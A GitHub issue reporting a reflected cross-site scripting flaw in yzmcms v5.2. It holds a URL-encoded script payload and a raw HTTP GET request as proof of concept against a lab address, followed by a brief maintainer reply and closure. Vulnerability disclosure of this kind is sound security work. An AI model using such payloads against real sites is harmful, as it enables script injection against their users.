Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

yzmcms v5.2 XSS #7

Closed
r0code opened this issue Nov 7, 2018 · 2 comments
Closed

yzmcms v5.2 XSS #7

r0code opened this issue Nov 7, 2018 · 2 comments

Comments

@r0code
Copy link

r0code commented Nov 7, 2018

http://192.168.1.40/search/index/archives/pubtime/1526387722/page/1.html
XSS payload: http://192.168.1.40/search/index/archives/pubtime/1526387722/page/1.html?tqh3l%22%3e%3cscript%3ealert(1)%3c%2fscript%3er6qt2=1

POC:
GET /search/index/archives/pubtime/1526387722/page/1.html?tqh3l%22%3e%3cscript%3ealert(1)%3c%2fscript%3er6qt2=1 HTTP/1.1
Host: 192.168.1.40
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.1.40/search/index/archives/pubtime/1526387722.html
Cookie: PHPSESSID=u0bh5qnr84qsu9aa0oj8vpkuk2

image

@yzmcms
Copy link
Owner

yzmcms commented Nov 7, 2018

小兄弟,你好厉害

@yzmcms yzmcms closed this as completed Nov 7, 2018
@r0code
Copy link
Author

r0code commented Nov 8, 2018 via email

@yzmcms yzmcms reopened this Nov 8, 2018
@yzmcms yzmcms closed this as completed Nov 8, 2018
Repository owner deleted a comment from r0code Nov 8, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants